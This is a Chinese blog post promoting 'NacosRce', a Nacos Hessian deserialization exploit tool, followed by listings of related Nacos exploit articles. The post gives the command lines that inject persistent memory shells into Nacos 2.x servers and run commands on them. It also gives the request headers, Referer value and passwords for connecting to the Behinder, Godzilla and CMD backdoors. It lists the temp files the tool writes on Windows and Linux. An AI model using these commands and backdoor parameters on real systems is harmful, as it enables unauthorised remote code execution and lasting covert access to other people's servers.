6!Nacos反序列化漏洞利用工具v0.5

最新推荐文章于 2025-03-14 15:43:43 发布
最新推荐文章于 2025-03-14 15:43:43 发布
阅读量2.2k 收藏 5
点赞数
分类专栏: 安全工具 文章标签: 安全 内存马 java Nacos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40456839/article/details/131778495
版权

项目简介

刨洞安全@凉风 师傅写的一个 Nacos Hessian 反序列化漏洞利用工具,目前已更新到v0.5,欢迎Star!

关注【Hack分享吧】公众号,回复关键字【230706】获取下载链接

图片

使用方法

1. 自动注入内存马并执行命令 java -jar NacosRce.jar Url Jraft端口 "Command"

java -jar NacosRce.jar http://192.168.90.1:8848  7848 "whoami"

2. 只注入内存马

java -jar NacosRce.jar http://192.168.90.1:8848 7848 memshell

一、冰蝎内存马:

需要设置请求头x-client-data:rebeyond
设置Referer:https://www.google.com/
路径随意
密码rebeyond

图片

二、哥斯拉内存马:

需要设置请求头x-client-data:godzilla
设置Referer:https://www.google.com/
路径随意
密码是pass和key

图片

三、CMD内存马:

需要设置请求头x-client-data:cmd
设置Referer:https://www.google.com/
请求头cmd:要执行的命令

图片

v0.5版本实现了

不出网漏洞利用
可多次发起漏洞利用
同时注入冰蝎/哥斯拉/CMD内存马
内存马对nacos多版本进行了兼容
修复windows的bug

 tips:

请用jdk1.8
适用于Nacos 2.x <= 2.2.2
非集群的也能打哦
此内存马重启nacos依然存活

注意事项

Windows如用下面的方式执行,注入内存马时会在以下目录生成两个临时文件

java -jar NacosRce.jar http://192.168.90.1:8848  7848 "whoami" windows

C:\Windows\Temp\nacos_data_temp
C:\Windows\Temp\nacos_data_temp.class

如果没有在最后加windows,临时文件会在以下目录,所以权限足够的话,不指定windows也能打成功,没打成功也许是因为没权限操作C盘或其他原因

/tmp/nacos_data_temp
/tmp/nacos_data_temp.class

Nacos漏洞综合利用工具v6.0
Wulai399的博客
05-20 2657
全网最强nacos漏洞综合利用工具
探索 Nacos反序列化漏洞CNVD-2023-45001
修己xj的博客
04-19 1099
安全是软件开发过程中的重中之重,漏洞修复和安全加固工作应该得到充分重视。针对 Nacos 反序列化漏洞,我们应该及时采取措施修复漏洞,保障系统的安全稳定运行。
Nacos漏洞综合利用工具
Fly_鹏程万里
05-27 681
漏洞检测支持非常规路径的检查,比如Nacos的路径为 http://xxx.xxx.xxx.xxx/home/nacos , 只需在目标中填入Nacos的路径即可,指纹识别功能会就去扫描三个路径(" "、"/nacos" 、"/home/nacos"),识别了Nacos才会开启漏洞扫描。Nacos漏洞综合利用GUI工具,集成了默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞反序列化漏洞的检测及其利用工具支持导入扫描字典,我们通过导入目标站点列表,随后进行"一键检测",实现对目标是否存在漏洞的检测。
工具Nacos漏洞综合利用工具v6.0
最新发布
2401_84578953的博客
03-14 1214
点击蓝字,关注Sec探索者,一起探索网络安全技术**前言**在攻防演练中,Nacos一直是红队攻击的重点目标之一,红队通常需要快速打点,尽快发现系统中的漏洞,并利用它们获取权限。
Nacos综合漏洞利用GUI工具-NacosExploitGUI
SuperherRo的博客
10-26 3809
Nacos综合漏洞利用GUI工具,集成了默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞反序列化漏洞的检测及其利用
一款Nacos漏洞自动化工具_nacos漏洞利用工具,阿里程序员的网络安全之路
2401_84248479的博客
04-11 1070
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
Nacos漏洞综合利用GUI工具(完整源码+说明)(身份认证绕过漏洞反序列化漏洞的检测及其利用.zip
03-27
【资源说明】 1、该资源内项目代码都是经过测试运行成功,功能正常的情况下才上传...Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞反序列化漏洞的检测及其利用.zip
Nacos 2.2.0反序列化漏洞和禅道18.0.0.1内网渗透
qq_63322621的博客
10-27 921
利用Nacos 2.2.0反序列化漏洞Nacos是一个广泛使用的配置管理和服务发现工具。在2.2.0版本中,存在反序列化漏洞,构造恶意的序列化数据包,通过Nacos反序列化机制触发漏洞,可以被利用来执行恶意代码。成功利用漏洞后,可以在目标系统上执行任意命令。禅道RCE漏洞:禅道是一款项目管理软件,其18.0.1版本中存在远程代码执行漏洞。通过该漏洞,攻击者可以向目标系统发送特制请求,执行任意代码。学习链接:下载Nacos安装包​​Windows安装java8教程。
【网络安全Nacos Client Yaml反序列化漏洞分析
HBohan的博客
10-15 6211
背景 Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。 Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。 Nacos 是构建以“服务”为中心的现代应用架构 (例如微服务范式、云原生范式) 的服务基础设施。 Nacos是阿里巴巴于2018年开源的项目,目前在Github中已获得 19.8kSt,由此可见其的使用广泛程度。 未授权访问漏洞 threedr3am师傅在去年十二月份的时候在Github上.
Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞的检测).zip
03-05
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用!...Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞反序列化漏洞的检测及其利用.zip
nacos漏洞检测工具-NacosExploitGUI
u013008898的博客
02-18 1015
GitHub - charonlight/NacosExploitGUI: Nacos漏洞综合利用GUI工具,集成了默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞反序列化漏洞的检测及其利用
Burpsuite 指纹特征绕过
Javachichi的博客
12-05 3171
需要高版本 17 + 的 burp 运行插件,可 bypass 网站流量设备的检测,正常抓包。未使用插件前,burp 指纹特征被识别,抓包被拦截。
工具分享 | NacosExploit - 一款Nacos综合利用工具,一键getshell。
IT软件汇
09-09 902
工具分享 | NacosExploit - 一款Nacos综合利用工具,一键getshell。
反序列化工具_Hessian反序列化RCE漏洞复现及分析
weixin_40003512的博客
12-02 1526
Hessian是一个轻量级的RPC框架。它基于HTTP协议传输,使用Hessian二进制序列化,对于数据包比较大的情况比较友好。Hessian反序列化类似Java反序列化,可导致RCE,POC好像2017年就公开了,但是最新版本hessian-4.0.60.jar,经过测试也存在反序列化RCE问题。使用marshalsec项目工具(https://github.com/mbechler/...
【poc整合】Nacos漏洞整理(下)附Nacos漏洞整合利用工具——removal接口RCE、Hessian 反序列化、Yaml反序列化、密码解密、部分常用敏感路径(漏洞更新截止2024.9.12)
m0_62783065的博客
09-13 1416
【poc整合】Nacos漏洞整理(下)附Nacos漏洞整合利用工具——removal接口RCE、Hessian 反序列化、Yaml反序列化、密码解密(漏洞更新截止2024.9.12)
一款Nacos漏洞自动化工具
Websec
10-31 948
只需在目标中填入Nacos的路径即可,指纹识别功能会就去扫描三个路径(" "、"/nacos" 、"/home/nacos"),识别了Nacos才会开启漏洞扫描。​ 本工具已经集成Nacos常见漏洞的检测及其利用工具为GUI版本,简单好用。3.4版本优化了内存注入处命令执行的代码,可单独检测是否存活,添加了批量扫描等。作者不对您使用该工具所产生的任何后果负任何法律责任。下次会优化批量扫描,多线程,添加进度条,暂停扫描,写完弱口令爆破等等。漏洞检测支持非常规路径的检查,比如Nacos的路径为。
一款Nacos漏洞自动化工具_nacos漏洞利用工具(1),2024年最新面试几个月还没找到工作
2401_84248479的博客
04-11 411
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
Nacos身份认证权限绕过+漏洞利用工具分享
zkaqlaoniao的博客
12-26 1896
单点登录是现在广泛使用的JWT的一个特性,因为它的开销很小,并且可以轻松地跨域使用。该信息可以被验证和信任,因为它是数字签名的。为了得到签名部分,你必须有编码过的header、编码过的payload、一个秘钥,签名算法是header中指定的那个,然对它们签名即可。4.复制上面得到的值,抓包修改包,添加Authorization值,发送到nacos,获取到登录成功的带有token的响应包。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。
Nacos反序列化漏洞的流量特征
05-31
Nacos反序列化漏洞是由于Nacos在处理客户端请求时存在反序列化安全问题而导致的,攻击者可以构造恶意的序列化数据,使得Nacos服务端在反序列化时执行恶意代码,从而造成服务器被攻击的危害。 关于Nacos反序列化漏洞的流量特征,可以从以下几个方面考虑: 1. 攻击者向Nacos服务端发送的恶意请求中,会包含大量的序列化数据,且这些数据在正常情况下是不应该出现在请求中的。 2. 正常情况下,Nacos服务端对客户端请求的响应中并不会包含序列化数据,而在受到攻击时,响应中可能会包含一些异常的序列化数据。 3. 由于攻击者构造的恶意请求可能比较特殊,因此在网络流量中可能会出现一些异常的特征,比如请求头、请求体等字段值不符合正常情况下的规范等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值